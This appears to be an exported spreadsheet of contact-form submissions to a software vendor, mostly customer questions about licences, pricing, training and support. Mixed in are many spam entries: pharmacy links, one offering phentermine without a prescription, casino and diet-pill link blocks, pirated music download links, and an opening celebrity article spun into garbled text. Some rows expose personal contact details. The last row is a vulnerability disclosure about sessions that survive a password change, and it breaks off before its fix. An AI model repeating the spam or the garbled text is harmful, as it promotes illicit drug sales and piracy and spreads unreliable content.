ACTRESS Shobna Gulati is literally trembling absent your sweetheart's lovely lady across the street image or rough our own stereotypes most of the time behind hard anodized cookware pregnant women in numerous subject to judgment additional illustrations. The Greenfield resident in town giggles mischievously during mentioned the pic spray.10:21, 19 interest rate 2010Updated04:37, 13 jan 2013New see Shobna. design by using Debs Hwhenfield stansted Arndale._x000D_
_x000D_
The Greenfield hawaiian for resident ) giggles mischievously so when inquired about the photograph snap._x000D_
_x000D_
"I think [url=http://asiame-com.weebly.com]Asiame scam[/url] you will stereotyped basically high-speed. [url=http://www.scoop.it/t/asiame-com]Asiame Review[/url] i have already been stereotyped by my contemporary society and by the point that I'm a girl, the young woman outlined._x000D_
_x000D_
"i feel generally photos will be surprising for a number of people and help you subvert a number of stereotypes about how i appreciate spotted and ways in which fernrrstliche the woman generally perceived._x000D_
_x000D_
"we've always heard no idea what folks [url=https://www.slideshare.net/Asiame]Asiame Review[/url] can potentially think,_x000D_
_x000D_
special, essentially the celebrity most widely known as Coronation Street's unassuming retail store young lady Sunita, Or as one of Victoria Wood's underneath exciting Dinnerladies._x000D_
_x000D_
not surprisingly, just read was quite simply factors your wife trialled, nevertheless vamping it up for the camera the Oldham created occasional actress are fully aware the woman may perhaps well uplift many eyebrows._x000D_
_x000D_
"i'm not sure should i be a subject to judgment gal, nevertheless it is so relaxed that no comes up my family in that light-weight, the woman a laugh. "When I began behaving during my 20s i got the main stormy sari dancer, featuring bathrooms continue to exist point inside sari in which it clung on my body system. later i seemed to play exceptionally abnormal littl</t>
  </si>
  <si>
    <t>Need to buy software</t>
  </si>
  <si>
    <t>celebrex _x000D_
[url=http://hqflagyl2017.com/]flagyl online[/url] _x000D_
&lt;a href="http://hqflagyl2017.com/"&gt;flagyl&lt;/a&gt; _x000D_
finasteride 5mg _x000D_
[url=http://hqvoltaren2017.com/]voltaren 50 mg[/url] _x000D_
&lt;a href="http://hqvoltaren2017.com/"&gt;voltaren 100 mg&lt;/a&gt; _x000D_
finasteride 1mg</t>
  </si>
  <si>
    <t>celebrex _x000D_
[url=http://hqflagyl2017.com/]buy flagyl online[/url] _x000D_
&lt;a href="http://hqflagyl2017.com/"&gt;flagyl online&lt;/a&gt; _x000D_
finasteride 1mg _x000D_
[url=http://hqvoltaren2017.com/]voltaren[/url] _x000D_
&lt;a href="http://hqvoltaren2017.com/"&gt;voltaren 100 mg&lt;/a&gt; _x000D_
propecia</t>
  </si>
  <si>
    <t>weight loss prescription drugs _x000D_
[url=http://regimenforfeit.com/]best diet supplements[/url] _x000D_
&lt;a href="http://regimenforfeit.com/"&gt;best over the counter diet pills&lt;/a&gt; _x000D_
lose weight fast</t>
  </si>
  <si>
    <t>Our company is interested in purchasing [BRAVA! Desktop] of your products #01._x000D_
So please give me detailed information, We will consider purchasing._x000D_
* Those with "conversion" function for PDF._x000D_
* Is this model supported "Japanese"?_x000D_
* What kind of payment methods do you have?_x000D_
_x000D_
Thank you.</t>
  </si>
  <si>
    <t>generic celebrex _x000D_
[url=http://hqflagyl2017.com/]buy flagyl online[/url] _x000D_
&lt;a href="http://hqflagyl2017.com/"&gt;flagyl antibiotic&lt;/a&gt; _x000D_
finasteride _x000D_
[url=http://hqvoltaren2017.com/]voltaren[/url] _x000D_
&lt;a href="http://hqvoltaren2017.com/"&gt;voltaren tablets&lt;/a&gt; _x000D_
propecia</t>
  </si>
  <si>
    <t>We would like to add additional prefix certificate to our Active Catalogue account, 10155955458. Please advise what we need to do next to add._x000D_
The additional UPC Company Prefix is 81123003._x000D_
_x000D_
Thank you.</t>
  </si>
  <si>
    <t>generic celebrex _x000D_
[url=http://hqflagyl2017.com/]flagyl[/url] _x000D_
&lt;a href="http://hqflagyl2017.com/"&gt;flagyl&lt;/a&gt; _x000D_
finasteride 5mg _x000D_
[url=http://hqvoltaren2017.com/]voltaren tablets[/url] _x000D_
&lt;a href="http://hqvoltaren2017.com/"&gt;voltaren&lt;/a&gt; _x000D_
buy propecia online</t>
  </si>
  <si>
    <t xml:space="preserve">Hi guys,_x000D_
I help companies to get the international talent with a needed skill set in Australia._x000D_
_x000D_
Would you like to have a 14-minute chat with me to talk about your needs and see how AIESEC the largest in the world youth-led organisation, with 70 years of experience and affiliated with United Nations can help you? </t>
  </si>
  <si>
    <t xml:space="preserve">Biller Account #: US01-168905, Currently Client using your Trusted Link product.  We are considering a migration from JD Edwards to NetSuites, and need to know if Trusted Link product will interface with NetSuites.  If so, what costs would Summit Group have to switch ERP platforms and continue using the Trusted Link product.  </t>
  </si>
  <si>
    <t>Hello,_x000D_
We are in the process of reviewing the services that are currently provided in our organization at the Fax level and we need some information to help us with our budget planning._x000D_
We are using the RightFax Business Edition with our testing (2 ports) and production (4 ports) environments._x000D_
Could you give us an estimate of the costs for adding these modules for our production licence ?_x000D_
•	Conversion PDF_x000D_
•	Exchange Web Services (EWS) Connector_x000D_
•	Synchronization Module_x000D_
Regards,_x000D_
Jym</t>
  </si>
  <si>
    <t>Hi-_x000D_
I have a client interested in a fax solution in Iowa, it is a public sector customer.  They are interested in seeing an on premise solution and if there was a pure cloud offering._x000D_
_x000D_
Thanks,_x000D_
Adam</t>
  </si>
  <si>
    <t>Looking to find OCR technology for automation of adding scanned/emailed documents directly into SAP.</t>
  </si>
  <si>
    <t>To whom it may concern,_x000D_
_x000D_
For a couple of years now we have been using your free Brava Reader and DWG Viewer._x000D_
We are a small construction company that does mostly earth formed concrete footings. The main use we have for your programs is for viewing blueprints that usually come in .pdf format but sometimes come in .dwg. The dilemma im facing is that I have 5 workstations that are used at various different times to either open up a file or to print, with the discontinuing of your free viewers I either have to switch to a different product such as adobe or purchase your other versions. Im having a hard time justifying purchasing 2 versions of your full software suite for 5 computers purely for printing out documents. On average we use DWF viewer to print less than 10 times a year, but Brava reader is used daily to view and print. What im looking for is to see if it would be possible to work out a price and purchase a version of your 2 viewer programs that have had the time bomb removed from them? That way I could pay for your programs that I prefer to use while not purchasing features that im not going to use._x000D_
_x000D_
Thank You for your time_x000D_
_x000D_
Paul Tobel</t>
  </si>
  <si>
    <t>Urgently need a quote for a 100 user licence to replace Brava! Viewer asap</t>
  </si>
  <si>
    <t>Вам не нужно будет объезжать десятки организаций, тратить свое драгоценное время и деньги, оплачивать командировки, услуги транспортной компании для поверки измерительных приборов!</t>
  </si>
  <si>
    <t>We are looking to upgrade a client infrastructure running RightFax 10 on Windows 2008 R2 VMs with OpenText Fax Gateway 308. We have a volume of approximately 60,000 Outgoing and 1,000 Incoming Faxes yearly._x000D_
_x000D_
What would be a correct infrastructure for them given that we want as much as possible to keep their environment 100% virtual maybe except for Fax Gateway that could be physical appliance._x000D_
_x000D_
Cloud Faxing like RightFax Connect Hybrid faxing with the Cloud is not likely a good solution for this customer that prefers a dedicated infrastructure than a Cloud infrastructure._x000D_
_x000D_
Regards.</t>
  </si>
  <si>
    <t>kasino _x000D_
[url=http://casinobablogames.com/]casino slots[/url] _x000D_
&lt;a href="http://casinobablogames.com/"&gt;top rated free online casino games&lt;/a&gt; _x000D_
vegas casino games</t>
  </si>
  <si>
    <t>Hello i am interested in any white papers related to the capability that your AP VIM solution has.  I am looking to understand the opportunity that this would provide.  Does your solution also have a vendor portal?</t>
  </si>
  <si>
    <t>celebrex _x000D_
[url=http://hqflagyl2017.com/]flagyl online[/url] _x000D_
&lt;a href="http://hqflagyl2017.com/"&gt;flagyl antibiotic&lt;/a&gt; _x000D_
propecia _x000D_
[url=http://hqvoltaren2017.com/]voltaren 50 mg[/url] _x000D_
&lt;a href="http://hqvoltaren2017.com/"&gt;voltaren tablets&lt;/a&gt; _x000D_
finasteride 5mg</t>
  </si>
  <si>
    <t>I would like to know who would be an account Rep for Metro and if that rep or someone from OpenText is available to talk about Metro and our account at HIMSS ?</t>
  </si>
  <si>
    <t>i need pricing for Open Text Brava DWG Viewer, end user is ABB in Montreal, Quebec ( i am a reseller) thanks!</t>
  </si>
  <si>
    <t xml:space="preserve">I am looking to align a strategic partnership that entails a 30% profit share without any upfront cost, target quota or commitment. </t>
  </si>
  <si>
    <t>I've contacted you twice already requesting a meeting to discuss MediaBin and have only had one phone call saying she would set up a time to meet. But that never happened. Any possibility that this can happen? Otherwise I will move on to another vendor._x000D_
Thank you.</t>
  </si>
  <si>
    <t>I know you probably cannot answer this question directly but before I can invest any time in researching this product I need a general quote. We are a print and mail service provider with a proprietary document processing system that handles hundreds of legacy formats and prints over 100 million documents a year. I need an estimate of how much OpenText will cost? Please reply via email.</t>
  </si>
  <si>
    <t xml:space="preserve">Can you provide high level pricing for OTMM Cloud Edition to meet the following approximate use..._x000D_
50 users_x000D_
200 view-only users_x000D_
_x000D_
Thanks!_x000D_
8TB of space to managed assets_x000D_
</t>
  </si>
  <si>
    <t>Previously purchased HP APA software license and we have been informed that opentext has acquired the product.  We need to speak with an account representative.</t>
  </si>
  <si>
    <t>Who can I work with the complete a confidentiality agreement?</t>
  </si>
  <si>
    <t>Could someone please contact me concerning OT courses for Content Server?  Also trying to find out if there is a standard government of Canada rate for courses.</t>
  </si>
  <si>
    <t>Good Morning - I am writing to inquire the Brava! Desktop 10 seat network. Is the network license floating? Meaning we can install Brava onto per say 16 computers but only 10 users can be using Brava at one time.</t>
  </si>
  <si>
    <t>Account information, License count &amp; invoice date</t>
  </si>
  <si>
    <t>REMOVE US FROM YOUR ROBO CALLS. BTW THERE IS NO "BLOCK" OPTION ON THIS WEBSITE. STOP IT NOW OR I WILL REPORT IT TO THE BBB.</t>
  </si>
  <si>
    <t>online casino no deposit bonus _x000D_
[url=http://casinobablogames.com/]play casinos[/url] _x000D_
&lt;a href="http://casinobablogames.com/"&gt;casino online for fun&lt;/a&gt; _x000D_
online casino gambling</t>
  </si>
  <si>
    <t>online casino no deposit bonus _x000D_
[url=http://casinobablogames.com/]online casino games[/url] _x000D_
&lt;a href="http://casinobablogames.com/"&gt;biggest no deposit welcome bonus&lt;/a&gt; _x000D_
casino games real money</t>
  </si>
  <si>
    <t>&lt;img class="aligncenter size-medium" src="http://picsee.net/upload/2018-02-20/32eca239830d.jpg" width="600" height="600" /&gt;Album Release Date: 2009-2018 _x000D_
Country: Germany _x000D_
Genre: Trance music, Vocal Trance music music music, Progressive Trance music music music _x000D_
Codec: MP3 image+cue, image Tracks _x000D_
Quality: ~182-320kbps CBR/VBR _x000D_
Playtime: 337:18:27&lt;img class="aligncenter size-medium" src="http://picsee.net/upload/2018-02-20/a6f1cee69b99.jpg" width="600" height="600" /&gt; _x000D_
 _x000D_
Download VA - Trance In Motion vol 001-233 (2009-2018) MP3 182-320kbps : _x000D_
Turbobit : _x000D_
 _x000D_
&lt;a href="http://turbobit.net/3swv5advqbf7.html"&gt;VA - Trance In Motion Vol 1-233 (2009-2018) MP3.part01.rar&lt;/a&gt; _x000D_
&lt;a href="http://turbobit.net/ch3h3jufyk5v.html"&gt;VA - Trance In Motion Vol 1-233 (2009-2018) MP3.part02.rar&lt;/a&gt; _x000D_
&lt;a href="http://turbobit.net/8lh2uofa549b.html"&gt;VA - Trance In Motion Vol 1-233 (2009-2018) MP3.part03.rar&lt;/a&gt; _x000D_
&lt;a href="http://turbobit.net/jbkw8gqqzexo.html"&gt;VA - Trance In Motion Vol 1-233 (2009-2018) MP3.part04.rar&lt;/a&gt; _x000D_
&lt;a href="http://turbobit.net/9j7ptpjgln9t.html"&gt;VA - Trance In Motion Vol 1-233 (2009-2018) MP3.part05.rar&lt;/a&gt; _x000D_
&lt;a href="http://turbobit.net/mzthsrwbymp7.html"&gt;VA - Trance In Motion Vol 1-233 (2009-2018) MP3.part06.rar&lt;/a&gt; _x000D_
&lt;a href="http://turbobit.net/pg2h0i5a5k2b.html"&gt;VA - Trance In Motion Vol 1-233 (2009-2018) MP3.part07.rar&lt;/a&gt; _x000D_
&lt;a href="http://turbobit.net/sucifugxbbi7.html"&gt;VA - Trance In Motion Vol 1-233 (2009-2018) MP3.part08.rar&lt;/a&gt; _x000D_
&lt;a href="http://turbobit.net/30dwpcrh9jdh.html"&gt;VA - Trance In Motion Vol 1-233 (2009-2018) MP3.part09.rar&lt;/a&gt; _x000D_
&lt;a href="http://turbobit.net/pwu4yz1skiwt.html"&gt;VA - Trance In Motion Vol 1-233 (2009-2018) MP3.part10.rar&lt;/a&gt; _x000D_
&lt;a href="http://turbobit.net/9kfb0g00wsrf.html"&gt;VA - Trance In Motion Vol 1-233 (2009-2018) MP3.part11.rar&lt;/a&gt; _x000D_
&lt;a href="http://turbobit.net/2nyx1k7fr2pc.html"&gt;VA - Trance In Motion Vol 1-233 (2009-2018) MP3.part12.rar&lt;/a&gt; _x000D_
 _x000D_
HitFile : _x000D_
 _x000D_
&lt;a href="http://www.hitfile.net/dVoUUYc"&gt;VA - Trance</t>
  </si>
  <si>
    <t>Fax service required._x000D_
_x000D_
Ray Rehlander_x000D_
Director of Field Operations_x000D_
LARSON-DANIELSON CONSTRUCTION COMPANY_x000D_
302 Tyler Street_x000D_
La Porte, IN 46360_x000D_
TEL: 219-336-2028_x000D_
FAX: 219-362-2848_x000D_
E-mail: ldconstruction@contractor.net_x000D_
www.ldconstruction.com</t>
  </si>
  <si>
    <t>Hello, I am trying to reach to ask for licenses renewals regarding PixTools for one of my customers, appreciate if someone can contact me back._x000D_
_x000D_
Thank You</t>
  </si>
  <si>
    <t>We need to buy some licenses of Brava Desktop.  It looks like we will need at least 24 seats.  We may need more in the future, but according to your system 24 is the maximum.  I am assuming that the next step is the enterprise licensing.  We are looking for the BravaDesktop TX I believe.  We really only use it to view .tiff files and .pdf's Our engineers like it as they can print out portions of drawings and zoom in and out to view details.  Email is probably the best contact information as I work in IT and I am out in the factory about 50% of the time.  Looking forward to the information.  Thanks for your help.  Todd.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
It is nice to e-meet you. I am reaching out to see if we could come to an arrangement to promote our upcoming conference to your audience in return of exposure on our website, onsite printed materials, marketing messages and also some tickets for you, or for you to give away._x000D_
_x000D_
We are a new conference and looking to connect more people around the Big Data and AI community with some incredible speakers, networking over delicious food too. Some of our speakers include:_x000D_
- Chief Architect, Microsoft_x000D_
- Chief Data Officer, Youmeng, Alibaba_x000D_
- Head of Partner Development APAC, Facebook_x000D_
- Head of Automotive Big Data Services, Baidu_x000D_
- Chief of Computational Engineering, Rolls-Royce_x000D_
- Head of Data Sciences &amp; Analytics, Canon_x000D_
 _x000D_
You can see more about our event and us here: https://forwardleading.co.uk/meetings/big-data-ai-leaders-sydney-2018_x000D_
_x000D_
I look forward to hearing if you’d like to partner and promote our event to your audience. We feel you’d make a great partner._x000D_
_x000D_
Regards,_x000D_
Jennifer</t>
  </si>
  <si>
    <t>Dear Sirs, you took a payment from my private credit card for Hightail, a service this company has used in the past, although not in the last year. I was unaware you were about to take a payment and I'm not sure how I would have known - you certainly didn't advise me. I write to ask if you will refund the payment. _x000D_
_x000D_
I did not know we still had a functioning Hightail service, if indeed we do._x000D_
_x000D_
The ownership of Syntropy Medica Ltd changed last year, with me and my wife as sole owners, and I am semi-retired._x000D_
_x000D_
Kind regards,_x000D_
Rob kemsley</t>
  </si>
  <si>
    <t>phentermine 37.5 without doctor's prescription _x000D_
[url=http://regimenforfeit.com/]diet pills[/url] _x000D_
&lt;a href="http://regimenforfeit.com/"&gt;weight loss drug&lt;/a&gt; _x000D_
weightloss pills</t>
  </si>
  <si>
    <t>i need to buy axs-one archiving in order to be intergreted with my oracle mail server</t>
  </si>
  <si>
    <t>Please let me know the process to get access for Documentum community or Developer Forum</t>
  </si>
  <si>
    <t>We want to enquire the Document Management System for EGA, Is there a way  we can have more details and  Demo Presentation.</t>
  </si>
  <si>
    <t>Not able to reset my password. Please help.</t>
  </si>
  <si>
    <t>Need full access to Opentext knowledge portal to download documents/guides/ softwares._x000D_
Please help.</t>
  </si>
  <si>
    <t xml:space="preserve">I want the full access to Opentext knowledge portal to download documents and everything. Please help how to get all the access._x000D_
Email ID: Chetan.purwar@wipro.com_x000D_
</t>
  </si>
  <si>
    <t>I'm looking to enroll Nera Telecommunications as an OpenText reseller / system integration partner. Please kindly direct me to the relevant channel team in OpenText South East Asia, thank you.</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
ich bin IT-Dienstleister und habe eine Anfrage eines Kunden der FirstClass nutzt und zu Microsoft Exchange migrieren möchte. Leider kenne ich mich mit FirstClass nicht aus und würde gerne Informationen bekommen wie man die Postfächer exportieren/archivieren kann._x000D_
_x000D_
MfG_x000D_
_x000D_
Andy Langner</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
 _x000D_
My name is Simon Pleass and I am the Managing Director at 2flow- an outsource fulfillment partner specialising in handling inventory. As part of my role, I like to stay up to date with current trends in the market and develop useful content around this so have created the infographic-_x000D_
http://bit.ly/2BrApH6 about how online retailers can reduce cart abandonment. Did you know that the average rate of cart abandonment is over 76%? Online shoppers are happy to fill up their ‘cart’ but very few actually complete a checkout. Learn how to minimise cart abandonment in the infographic._x000D_
 _x000D_
I was looking at your site and I think that your readers would be quite likely to take an interest in our infographic. If you decide to use it that would be brilliant, although I would ask that you kindly credit my website using this URL http://www.2flow.ie/logistics.html  ._x000D_
 _x000D_
Also, I can write a unique summary to accompany the infographic if you wish._x000D_
If you have any feedback or queries, I would be delighted to hear from you._x000D_
 _x000D_
Regards,_x000D_
Simon Pleass_x000D_
</t>
  </si>
  <si>
    <t>Check it out here - http://www.yohaig.ng/</t>
  </si>
  <si>
    <t>Custom xcp training in USA for 3 person. Thanks</t>
  </si>
  <si>
    <t>Hi, _x000D_
_x000D_
I wanted to know if you have a tagging feature that would link uploaded transcripts with video. For example, we have a video, visually we will tag the proxies in a certain way. But now, that video also contains text. To tag the text, we don't want to mention non-visual related metadata by tagging the video. Instead, we want to tag the transcript and/or video to say "this part went for YouTube, this went for Whatsapp". We need to keep track of our published assets - all of which should point back to the source. So, we have a source video footage which has the RAW video and the transcript. The purpose of this is so that whenever we see our RAW content, which is what we will use to find future content, we need to see if it has already been used, when, where, etc. So we can choose to re-use an already edited section and not edit again, or we can choose to skip it since it has already been edited and published. Thanks._x000D_
_x000D_
Pranam, _x000D_
Maa Seva</t>
  </si>
  <si>
    <t>Hi Team,_x000D_
I'm unable to access any open text forums especially Documentum forums._x000D_
when ever I'm trying to open forums, a window is getting opened with  Permission Problem message._x000D_
Could you please provide me the access to forums._x000D_
_x000D_
Thanks &amp; Regards,_x000D_
Jalaja.</t>
  </si>
  <si>
    <t xml:space="preserve">I am a member of MSCC Mauritius Software Craftsmen Community and we are having our annual conference in May. We are looking for speakers on various information technology subjects.  I used to work in London england and was a very successful user of ACTUATE BIRT and was a recipient of their International Award in 2009.  I can assist in a joint demonstration of BIRT at the conference and would appreciate if you could attend.  However if you cannot attend then if possible can you send promotional material and perhaps a couple of books as prizes for attendees.  If interested please contact me by e-mail and then i will put your contact in touch with the organiser who will explain in detail the conference etc. </t>
  </si>
  <si>
    <t xml:space="preserve">Filing System enquiry - documents/files scanning - Archiving </t>
  </si>
  <si>
    <t>lrmyqg@contmy.info</t>
  </si>
  <si>
    <t>Hi There,_x000D_
_x000D_
We have recently been picked up by Nordstrom and require a UPC catalogue to work with them. Can someone please contact me with some information on working with Open Text and any costs associated._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Ashley Pilkinton - Homebodii</t>
  </si>
  <si>
    <t>StoryTeller training options in USA</t>
  </si>
  <si>
    <t>Looking at initial cost to use your service for e-fax. Small company of 10 -15 users, roughly.</t>
  </si>
  <si>
    <t>I am documenting the licenses I bought since 2012 for my company. I need all PMCs for the licenses. Please advise._x000D_
_x000D_
Regards, _x000D_
_x000D_
Conrado</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I hope you are doing great. _x000D_
_x000D_
I wanted to reach out and check whether we can have quick chat to discuss database of various prospects mentioned below from Law firms, Professional Services, Banking, Real Estate, Tax, Banking, Insurance and many more based on your criteria._x000D_
_x000D_
Job Titles include: CEOs, CFOs, CTOs, Attorney, Compliance Director, Senior Partners, Compliance Specialist, Practice Partners, Managing Directors, Contracts Administrator, Contracts Manager, Proposal Specialist, Regulatory Affairs Specialist, Paralegals, Barristers, IT Directors, Technology Advisors, Legal Secretary and many more._x000D_
_x000D_
Kindly let me know your target criteria you want to target._x000D_
_x000D_
Target Industry :_x000D_
Target Geography :_x000D_
Target Job Title :_x000D_
_x000D_
Look forward to your response._x000D_
_x000D_
Regards,_x000D_
Kiyara James</t>
  </si>
  <si>
    <t xml:space="preserve">I am reaching out after identifying Opentext as company that offers enterprise solutions to a wide range of industries and may potentially find our events of interest._x000D_
 _x000D_
Right now I am working on our 2018 CFO program…_x000D_
 _x000D_
May 3, The Harvard Club, New York City_x000D_
See the full list of the executives confirmed to be in New York_x000D_
_x000D_
June 14, The Ritz Carlton Downtown, San Francisco_x000D_
See the full list of the executives confirmed to be in San Francisco_x000D_
 _x000D_
We’re gathering senior finance executives from a wide range of industries and ranging from Fortune 1000 to mid-sized companies in the US who are taking a proactive approach towards evaluating the vendor/service marketspace. As you can imagine, I thought there could be some synergy here and an opportunity for business development. _x000D_
  _x000D_
I’ve also attached some information for your review. Would you have any interest in learning more?_x000D_
 _x000D_
Regards,_x000D_
Genesis _x000D_
</t>
  </si>
  <si>
    <t>Good day,_x000D_
_x000D_
We do have a large quantity of pdf documents produced by us that we would like to process. As a first phase of our long term project, we would like to export to xml a specific part of our documents and I think this would require some customization of your tools._x000D_
If you would be interested to discuss with us about what we would like in terms of a working solution, we could setup a conf call / webex to discuss further more._x000D_
_x000D_
Basically, instead of tagging automatically the text (that could be complicated in our case since our texts needs to be tagged twice (English then French), we would like some sort of toolbar that suggest what should be the next tag to insert. The user would then have to click were in the text that specific tag should go. ie.:_x000D_
_x000D_
System purpose &lt;tag1_english&gt;_x000D_
User click where &lt;tag1_english&gt; begins_x000D_
System purpose &lt;/tag1_english&gt;_x000D_
User click where &lt;/tag1_english&gt; finish_x000D_
System purpose &lt;tag1_french&gt;_x000D_
User click where &lt;tag1_french&gt; begins_x000D_
System purpose &lt;/tag1_french&gt;_x000D_
User click where &lt;/tag1_french&gt; finish_x000D_
_x000D_
_x000D_
As for an sample of what we would like to achieve, I send you a source document and what we would like to tag and export to xml as the first part of our project._x000D_
_x000D_
We are still in the process of thinking our xml tag naming convention but I think that the mechanic of how to proceed is more important._x000D_
_x000D_
Either way, let me know if that kind of project could fit in the scope of your business._x000D_
_x000D_
Thanks !</t>
  </si>
  <si>
    <t>Trying to get support on my Connection Central. Perhaps I setup my new computer incorrectly, but on Windows 7 it was displaying folders as folders when connecting to my HP-UX box. On Windows 10, it is displaying everything as a file. Also, when logging into your site, it wouldn't allow me past Account Settings to get to My Support.  We have a current maintenance renewal agreement that expires September 30, 2018.</t>
  </si>
  <si>
    <t>We're trying to find out who our sales rep is since Jack Shea is no longer with OpenText. Can someone please contact me? Thanks.</t>
  </si>
  <si>
    <t>Could you please send me a short description of Documentum?_x000D_
Thank you</t>
  </si>
  <si>
    <t>We currently have a few accounts for Active Catalog and need to both add and delete users due to a company reorg.  I am not certain who our account contact is.  Can that individual reach out via email so we can update users?  _x000D_
Thanks in advance</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
It is the best time to make some plans for the future and it's time to be happy. I've learn this post and if I may just I desire to counsel you some attention-grabbing things or tips. Maybe you can write subsequent articles relating to this article. I desire to read even more things about it! _x000D_
------------------------------------------ _x000D_
http://megasto.com.ua _x000D_
 _x000D_
f7rpf9Sg6L</t>
  </si>
  <si>
    <t xml:space="preserve">Procurement of Opentext solution </t>
  </si>
  <si>
    <t>Not able to access Knowledge base or links needed to support product at Erlanger Health Systems</t>
  </si>
  <si>
    <t>Je suis un consultant Streamserve cherchant  à se certifier dans tous les modules OpenText et être en partenariat avec OpenText</t>
  </si>
  <si>
    <t xml:space="preserve">Good afternoon, I am the General Manager of Customer Engagement and am currently reviewing options for financial parity software for our ~ 700 automotive retailers. Is this something you have experience in and if so do you have a UK based support team? _x000D_
I look forward to hearing from you_x000D_
Kind regards_x000D_
Jessica </t>
  </si>
  <si>
    <t xml:space="preserve">Interested in OpenText DAM for small business options and pricing. </t>
  </si>
  <si>
    <t>prescription weight loss medication _x000D_
[url=http://regimenforfeit.com/]best weight loss products[/url] _x000D_
&lt;a href="http://regimenforfeit.com/"&gt;best diet pill&lt;/a&gt; _x000D_
best diet pills</t>
  </si>
  <si>
    <t>Angebotsanfrage Vertragskonsolidierung und Supportverlängerung OpenText CMS Content Management System</t>
  </si>
  <si>
    <t xml:space="preserve">I am looking for redaction software and came across your 'redact-it' software. I would like to find out more and possibly trial it. </t>
  </si>
  <si>
    <t>We are investigating Brava! Desktop TXL-N. _x000D_
1. Please confirm if this version measures line, polyline, polygon, rectangle &amp; circle._x000D_
2. Please confirm if free life time updates are included._x000D_
Please respond with e-mail. Thank you very much.</t>
  </si>
  <si>
    <t>play casino games online _x000D_
[url=http://casinoline17.com/]free online casino[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;free casino games and poker&lt;/a&gt; _x000D_
online casino slots</t>
  </si>
  <si>
    <t>Hey Dear,_x000D_
_x000D_
This is Priya Jatoliya and that I work as a freelance content writer in India. I specialize on writing distinctive, partaking and high-quality content for the education section and my work has been published on many individual and syndicated blogs._x000D_
_x000D_
I would love a chance to publish my work with you._x000D_
_x000D_
Benefits for You:_x000D_
_x000D_
    You will not be needed to buy the content._x000D_
    You will own the content copyrights._x000D_
    You can use your own by-line once the content goes live._x000D_
    I will promote the content through my social network, which can facilitate your website gain visibility._x000D_
_x000D_
Please let me know if you’re interested in featuring my content and how we can take this conversation forward._x000D_
 _x000D_
I look forward to hearing from you soon._x000D_
_x000D_
Thanks &amp; Regards_x000D_
Priya Jatoliya</t>
  </si>
  <si>
    <t>Want to become reseller for your openText product</t>
  </si>
  <si>
    <t>want to upgrade for the better quality.</t>
  </si>
  <si>
    <t>Вас Вас приветствует сайт рассылки http://r-z-r.ru _x000D_
.</t>
  </si>
  <si>
    <t xml:space="preserve">We are in the process of looking at process mapping/modeling tools.  Would like some more information on what you have to offer and contact information of someone we can reach out to for further questions.  _x000D_
Thanks.  </t>
  </si>
  <si>
    <t>casino games free _x000D_
[url=http://casinoline17.com/]online casino no deposit bonus[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;online casinos for us players&lt;/a&gt; _x000D_
online gambling sites for real money</t>
  </si>
  <si>
    <t>[url=https://www.ebay.com/itm/323027068186][img]https://c.radikal.ru/c30/1801/73/bc6f49a1cb2d.jpg[/img][/url] _x000D_
 _x000D_
[url=https://www.ebay.com/itm/323027068186]Get 63% OFF! MOST comfortable bicycle seat! _x000D_
Designed to fit all sizes of standard bicycle seat including exercise training bikes. _x000D_
Made with silicone gel this seat cover with be sure to have you riding for days! _x000D_
[/url]</t>
  </si>
  <si>
    <t>RightFax pricing</t>
  </si>
  <si>
    <t>casino online free _x000D_
[url=http://casinoline17.com/]free online casino[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;casinos online&lt;/a&gt; _x000D_
free casino games and poker</t>
  </si>
  <si>
    <t>prescription diet pills _x000D_
[url=http://regimenforfeit.com/]best prescription weight loss medication[/url] _x000D_
&lt;a href="http://regimenforfeit.com/"&gt;best appetite suppressants&lt;/a&gt; _x000D_
diet pills that really work</t>
  </si>
  <si>
    <t>weight loss pills that work _x000D_
[url=http://regimenforfeit.com/]weight loss pills that work[/url] _x000D_
&lt;a href="http://regimenforfeit.com/"&gt;weightloss pills&lt;/a&gt; _x000D_
2017 best weight loss pills</t>
  </si>
  <si>
    <t xml:space="preserve">version compatibility with windows operating systems.  Is there an easy to follow opentext chart to help in what is needed to move to windows 10?_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Had and accident on February 11 2018 about 12am on 17 92 Davenport Florida right off of Ronald Reagan Parkway. Wondering if you have street camera's and if we're working . Trying to find out some info on the accident. </t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I have questions about the course 3-8201 Captiva 7.6 Fundamentals and Administration, possibly the one starting on February 26th in a virtual classroom for North America. We are thinking of enrolling two persons in it and we'd like to know the schedule of the classes, meaning starting and ending hours. I presume the 5 days duration means 5 consecutive business days._x000D_
_x000D_
We would also like to know if you offer this course in French in a virtual classroom. There's no such thing appearing in the schedule displayed on your site but I'm asking just in case._x000D_
_x000D_
Regards,_x000D_
Simon Labrie</t>
  </si>
  <si>
    <t>Hello,_x000D_
I am again reporting BUGS which was previously reported by me on  " 4/26/17 " to email  " 	itsecuritycompliance@opentext.com " because i was unknown kf reporting bugs through this way !_x000D_
_x000D_
I'm Raja Uzair Abdullah I am a student,a little web designer,Web Security. I have found a  Security Vulnerability and now reporting to you._x000D_
_x000D_
BUG # 01_x000D_
_x000D_
Bug Type : Sessional Fixation ( Possible Account Takeover )_x000D_
_x000D_
Checked in : Firefox 27.0 _x000D_
_x000D_
OS : Windows 10_x000D_
_x000D_
PROCEDURE AND DESCRIPTION:_x000D_
_x000D_
Impact:_x000D_
It has High impact as per authentication error happens by which account of user is in danger and can leads to take over._x000D_
_x000D_
Procedure:_x000D_
Issue: Broken Session Management in password change procedure_x000D_
_x000D_
Description:_x000D_
The session management in the password change parameter is broken in the web application. Sessions are not invalidated once the passwords are changed internally from the account. A user can browser the web application with two passwords_x000D_
_x000D_
Steps to reproduce:_x000D_
+ Login to the web application from two web browsers_x000D_
+ Go to the web page of password change_x000D_
+ Change he password_x000D_
 + Reload the account on other browser you will found your self logged in. _x000D_
_x000D_
Impact:_x000D_
The Session in the other browser would not be invalidated because of this. You should destroy all sessions once the password is changed_x000D_
_x000D_
Risk:_x000D_
An attacker with the compromised email would still have access of the client would change the password from that email_x000D_
_x000D_
Fix:_x000D_
